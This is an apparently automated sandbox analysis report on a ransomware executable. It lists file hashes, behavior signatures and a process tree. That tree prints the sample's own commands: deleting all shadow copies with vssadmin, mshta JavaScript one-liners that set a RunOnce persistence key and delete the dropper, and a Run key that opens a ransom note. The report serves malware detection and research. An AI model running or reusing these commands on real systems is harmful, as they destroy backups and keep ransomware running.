Analysis
-
max time kernel
273s -
max time network
277s -
platform
windows10_x64 -
resource
win10v20210410 -
submitted
14-08-2021 02:17
Static task
static1
Behavioral task
behavioral1
Sample
028f0b1092caf4711857d0958bc798882c4ac9285895c3628f5be0c988f1d560.exe
Resource
win7v20210408
Behavioral task
behavioral2
Sample
028f0b1092caf4711857d0958bc798882c4ac9285895c3628f5be0c988f1d560.exe
Resource
win10v20210410
General
-
Target
028f0b1092caf4711857d0958bc798882c4ac9285895c3628f5be0c988f1d560.exe
-
Size
256KB
-
MD5
156ed66fb7257ef1bdd6385c71e5aa83
-
SHA1
2d302323eab61e5791ab5ce2c6728e6708743bed
-
SHA256
028f0b1092caf4711857d0958bc798882c4ac9285895c3628f5be0c988f1d560
-
SHA512
c63a679abf8eb64ba4a722df4638249499d8ab9e6a94db5e3d39ab136afbe4cec563ff9698814170b12e55d5616865776273303e99a5b7e8742bc870ae5ebdb4
Malware Config
Signatures
-
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Blocklisted process makes network request 6 IoCs
Processes:
mshta.exeflow pid process 16 3272 mshta.exe 17 3272 mshta.exe 19 3272 mshta.exe 20 3272 mshta.exe 22 3272 mshta.exe 24 3272 mshta.exe -
Executes dropped EXE 1 IoCs
Processes:
trust.exepid process 2820 trust.exe -
Modifies extensions of user files 1 IoCs
Ransomware generally changes the extension on encrypted files.
Processes:
trust.exedescription ioc process File opened for modification C:\Users\Admin\Pictures\ReceiveWait.tiff trust.exe -
Deletes itself 1 IoCs
Processes:
mshta.exepid process 3712 mshta.exe -
Adds Run key to start application 2 TTPs 4 IoCs
Processes:
mshta.exetrust.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce mshta.exe Set value (str) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\{EE750B8B-8F1F-4FEB-B415-B9B0FDBD4893} = "C:\\Users\\Admin\\AppData\\Local\\trust.exe" mshta.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Windows\CurrentVersion\Run trust.exe Set value (str) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Windows\CurrentVersion\Run\How to restore files = "mshta.exe \"C:\\Users\\Admin\\How to restore files.hta\"" trust.exe -
Drops desktop.ini file(s) 25 IoCs
Processes:
trust.exedescription ioc process File opened for modification C:\Users\Admin\Contacts\desktop.ini trust.exe File opened for modification C:\Users\Admin\OneDrive\desktop.ini trust.exe File opened for modification C:\Users\Admin\Pictures\desktop.ini trust.exe File opened for modification C:\Users\Admin\Searches\desktop.ini trust.exe File opened for modification C:\Users\Public\Music\desktop.ini trust.exe File opened for modification C:\Users\Admin\Desktop\desktop.ini trust.exe File opened for modification C:\Users\Admin\Documents\desktop.ini trust.exe File opened for modification C:\Users\Admin\Music\desktop.ini trust.exe File opened for modification C:\Users\Admin\Pictures\Saved Pictures\desktop.ini trust.exe File opened for modification C:\Users\Admin\Saved Games\desktop.ini trust.exe File opened for modification C:\$Recycle.Bin\S-1-5-21-3686645723-710336880-414668232-1000\desktop.ini trust.exe File opened for modification C:\Users\Public\Desktop\desktop.ini trust.exe File opened for modification C:\Users\Public\desktop.ini trust.exe File opened for modification C:\Users\Public\Downloads\desktop.ini trust.exe File opened for modification C:\Users\Public\Libraries\desktop.ini trust.exe File opened for modification C:\Users\Admin\Favorites\desktop.ini trust.exe File opened for modification C:\Users\Admin\Favorites\Links\desktop.ini trust.exe File opened for modification C:\Users\Admin\Pictures\Camera Roll\desktop.ini trust.exe File opened for modification C:\Users\Admin\Videos\desktop.ini trust.exe File opened for modification C:\Users\Public\Documents\desktop.ini trust.exe File opened for modification C:\Users\Public\Pictures\desktop.ini trust.exe File opened for modification C:\Users\Public\Videos\desktop.ini trust.exe File opened for modification C:\Users\Admin\Downloads\desktop.ini trust.exe File opened for modification C:\Users\Admin\Links\desktop.ini trust.exe File opened for modification C:\Users\Public\AccountPictures\desktop.ini trust.exe -
Maps connected drives based on registry 3 TTPs 4 IoCs
Disk information is often read in order to detect sandboxing environments.
Processes:
trust.exe028f0b1092caf4711857d0958bc798882c4ac9285895c3628f5be0c988f1d560.exedescription ioc process Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum\0 trust.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum 028f0b1092caf4711857d0958bc798882c4ac9285895c3628f5be0c988f1d560.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum\0 028f0b1092caf4711857d0958bc798882c4ac9285895c3628f5be0c988f1d560.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum trust.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
Processes:
vssadmin.exepid process 3276 vssadmin.exe -
Kills process with taskkill 1 IoCs
Processes:
taskkill.exepid process 3600 taskkill.exe -
Suspicious behavior: EnumeratesProcesses 16 IoCs
Processes:
028f0b1092caf4711857d0958bc798882c4ac9285895c3628f5be0c988f1d560.exetrust.exepid process 3912 028f0b1092caf4711857d0958bc798882c4ac9285895c3628f5be0c988f1d560.exe 3912 028f0b1092caf4711857d0958bc798882c4ac9285895c3628f5be0c988f1d560.exe 3912 028f0b1092caf4711857d0958bc798882c4ac9285895c3628f5be0c988f1d560.exe 3912 028f0b1092caf4711857d0958bc798882c4ac9285895c3628f5be0c988f1d560.exe 3912 028f0b1092caf4711857d0958bc798882c4ac9285895c3628f5be0c988f1d560.exe 3912 028f0b1092caf4711857d0958bc798882c4ac9285895c3628f5be0c988f1d560.exe 3912 028f0b1092caf4711857d0958bc798882c4ac9285895c3628f5be0c988f1d560.exe 3912 028f0b1092caf4711857d0958bc798882c4ac9285895c3628f5be0c988f1d560.exe 2820 trust.exe 2820 trust.exe 2820 trust.exe 2820 trust.exe 2820 trust.exe 2820 trust.exe 2820 trust.exe 2820 trust.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
Processes:
vssvc.exetaskkill.exedescription pid process Token: SeBackupPrivilege 3940 vssvc.exe Token: SeRestorePrivilege 3940 vssvc.exe Token: SeAuditPrivilege 3940 vssvc.exe Token: SeDebugPrivilege 3600 taskkill.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
Processes:
mshta.exepid process 3272 mshta.exe -
Suspicious use of WriteProcessMemory 24 IoCs
Processes:
028f0b1092caf4711857d0958bc798882c4ac9285895c3628f5be0c988f1d560.exetrust.execmd.exedescription pid process target process PID 3912 wrote to memory of 2820 3912 028f0b1092caf4711857d0958bc798882c4ac9285895c3628f5be0c988f1d560.exe trust.exe PID 3912 wrote to memory of 2820 3912 028f0b1092caf4711857d0958bc798882c4ac9285895c3628f5be0c988f1d560.exe trust.exe PID 3912 wrote to memory of 2820 3912 028f0b1092caf4711857d0958bc798882c4ac9285895c3628f5be0c988f1d560.exe trust.exe PID 3912 wrote to memory of 3712 3912 028f0b1092caf4711857d0958bc798882c4ac9285895c3628f5be0c988f1d560.exe mshta.exe PID 3912 wrote to memory of 3712 3912 028f0b1092caf4711857d0958bc798882c4ac9285895c3628f5be0c988f1d560.exe mshta.exe PID 3912 wrote to memory of 3712 3912 028f0b1092caf4711857d0958bc798882c4ac9285895c3628f5be0c988f1d560.exe mshta.exe PID 2820 wrote to memory of 3564 2820 trust.exe mshta.exe PID 2820 wrote to memory of 3564 2820 trust.exe mshta.exe PID 2820 wrote to memory of 3564 2820 trust.exe mshta.exe PID 2820 wrote to memory of 3276 2820 trust.exe vssadmin.exe PID 2820 wrote to memory of 3276 2820 trust.exe vssadmin.exe PID 2820 wrote to memory of 3276 2820 trust.exe vssadmin.exe PID 2820 wrote to memory of 3272 2820 trust.exe mshta.exe PID 2820 wrote to memory of 3272 2820 trust.exe mshta.exe PID 2820 wrote to memory of 3272 2820 trust.exe mshta.exe PID 2820 wrote to memory of 2160 2820 trust.exe cmd.exe PID 2820 wrote to memory of 2160 2820 trust.exe cmd.exe PID 2820 wrote to memory of 2160 2820 trust.exe cmd.exe PID 2160 wrote to memory of 3600 2160 cmd.exe taskkill.exe PID 2160 wrote to memory of 3600 2160 cmd.exe taskkill.exe PID 2160 wrote to memory of 3600 2160 cmd.exe taskkill.exe PID 2820 wrote to memory of 1860 2820 trust.exe mshta.exe PID 2820 wrote to memory of 1860 2820 trust.exe mshta.exe PID 2820 wrote to memory of 1860 2820 trust.exe mshta.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\028f0b1092caf4711857d0958bc798882c4ac9285895c3628f5be0c988f1d560.exe"C:\Users\Admin\AppData\Local\Temp\028f0b1092caf4711857d0958bc798882c4ac9285895c3628f5be0c988f1d560.exe"1⤵
- Maps connected drives based on registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\trust.exe"C:\Users\Admin\AppData\Local\trust.exe" runas2⤵
- Executes dropped EXE
- Modifies extensions of user files
- Adds Run key to start application
- Drops desktop.ini file(s)
- Maps connected drives based on registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\mshta.exemshta.exe "javascript:o=new ActiveXObject('WScript.Shell');setInterval(function(){try{o.RegWrite('HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\{EE750B8B-8F1F-4FEB-B415-B9B0FDBD4893}','C:\\Users\\Admin\\AppData\\Local\\trust.exe');}catch(e){}},10);"3⤵
- Adds Run key to start application
-
C:\Windows\SysWOW64\vssadmin.exevssadmin.exe Delete Shadows /All /Quiet3⤵
- Interacts with shadow copies
-
C:\Windows\SysWOW64\mshta.exemshta.exe "C:\Users\Admin\How to restore files.hta"3⤵
- Blocklisted process makes network request
- Suspicious use of FindShellTrayWindow
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C taskkill /PID 3564 /F3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\taskkill.exetaskkill /PID 3564 /F4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\mshta.exemshta.exe "javascript:o=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{o.DeleteFile('C:\\Users\\Admin\\AppData\\Local\\trust.exe');close()}catch(e){}},10);"3⤵
-
C:\Windows\SysWOW64\mshta.exemshta.exe "javascript:o=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{o.DeleteFile('C:\\Users\\Admin\\AppData\\Local\\Temp\\028f0b1092caf4711857d0958bc798882c4ac9285895c3628f5be0c988f1d560.exe');close()}catch(e){}},10);"2⤵
- Deletes itself
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\Desktop\How to restore files.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}1⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\$Recycle.Bin\S-1-5-21-3686645723-710336880-414668232-1000\desktop.iniMD5
a526b9e7c716b3489d8cc062fbce4005
SHA12df502a944ff721241be20a9e449d2acd07e0312
SHA256e1b9ce9b57957b1a0607a72a057d6b7a9b34ea60f3f8aa8f38a3af979bd23066
SHA512d83d4c656c96c3d1809ad06ce78fa09a77781461c99109e4b81d1a186fc533a7e72d65a4cb7edf689eeccda8f687a13d3276f1111a1e72f7c3cd92a49bce0f88
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\5TQ9Z63L\4iCs6KVjbNBYlgoKfw7y[1].eotMD5
03c831f7b9cdf705e0565484d568b6f6
SHA1b738b697d55aee78d144a23697eba4fd03571e93
SHA25611ceefbbdf2a7c3bc8a16cd7d95605849711b2490b36ebec89c4ae13dfe2d1dc
SHA512f69a97b2f5ce7053596c7349a71fb68d0f7c69c361da8604fad0177b413bb197ef4fa5f0afd0b50befe90b07e19d41d3be7f520334987a7f08c367c64cad5532
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\GDGLHSEM\css[1].cssMD5
5dac57c84854eda4cd49c0ab5e7b289c
SHA1d61afb9b10e8925ecef2b99afb9d61b691fe99f6
SHA256eeca6edb7ddb9bc96001f753a26805454e1f2d24b6ab424200eb99f2a0de17e9
SHA51263187ba234b662e2950a4240c4a99b442a3d5cac9602fbf3e31012e060aa279648c5e8bb581625ad178bc0aa963318205f0aa71415fa12937b3518265956c77c
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\U0EJMF7X\css[1].cssMD5
1149800c6e7b84abe6184f1cf50a36c4
SHA1e692eef86c038a84196f4bec2312764c25f60dfb
SHA2564e32d3003986ad22118a79ec9bb5b878a2b3c8c4cacb12b8297be6c52bb7e2ff
SHA512c5e2610a76965b370441f827c6e9f0c075b9eeefd9d9442c48c0deac1e3cb6195a5c75234f1d9db1cef4b9bbb06764f66dc322976468f61cd5660277f72d964a
-
C:\Users\Admin\AppData\Local\trust.exeMD5
156ed66fb7257ef1bdd6385c71e5aa83
SHA12d302323eab61e5791ab5ce2c6728e6708743bed
SHA256028f0b1092caf4711857d0958bc798882c4ac9285895c3628f5be0c988f1d560
SHA512c63a679abf8eb64ba4a722df4638249499d8ab9e6a94db5e3d39ab136afbe4cec563ff9698814170b12e55d5616865776273303e99a5b7e8742bc870ae5ebdb4
-
C:\Users\Admin\AppData\Local\trust.exeMD5
156ed66fb7257ef1bdd6385c71e5aa83
SHA12d302323eab61e5791ab5ce2c6728e6708743bed
SHA256028f0b1092caf4711857d0958bc798882c4ac9285895c3628f5be0c988f1d560
SHA512c63a679abf8eb64ba4a722df4638249499d8ab9e6a94db5e3d39ab136afbe4cec563ff9698814170b12e55d5616865776273303e99a5b7e8742bc870ae5ebdb4
-
C:\Users\Admin\Desktop\How to restore files.htaMD5
baea36a6937c0186f2011df9f9604b54
SHA1f56e99f8e839c5a372637d9115817e634c18c58e
SHA2564a93edc002924dcdbb19989e0f87b92af800bd33b573073d0cd07386dce56c4c
SHA512de23509f7e85a40b2a1ba99877cb9c10c10de771f142328f47782174a6da732f442838999cf62e85fbe5bda960eea0d9c0c9ca3f9e56374828690e97f8c6a2a7
-
C:\Users\Admin\How to restore files.htaMD5
baea36a6937c0186f2011df9f9604b54
SHA1f56e99f8e839c5a372637d9115817e634c18c58e
SHA2564a93edc002924dcdbb19989e0f87b92af800bd33b573073d0cd07386dce56c4c
SHA512de23509f7e85a40b2a1ba99877cb9c10c10de771f142328f47782174a6da732f442838999cf62e85fbe5bda960eea0d9c0c9ca3f9e56374828690e97f8c6a2a7
-
memory/1860-125-0x0000000000000000-mapping.dmp
-
memory/2160-123-0x0000000000000000-mapping.dmp
-
memory/2820-114-0x0000000000000000-mapping.dmp
-
memory/3272-121-0x0000000000000000-mapping.dmp
-
memory/3276-119-0x0000000000000000-mapping.dmp
-
memory/3564-118-0x0000000000000000-mapping.dmp
-
memory/3600-124-0x0000000000000000-mapping.dmp
-
memory/3712-117-0x0000000000000000-mapping.dmp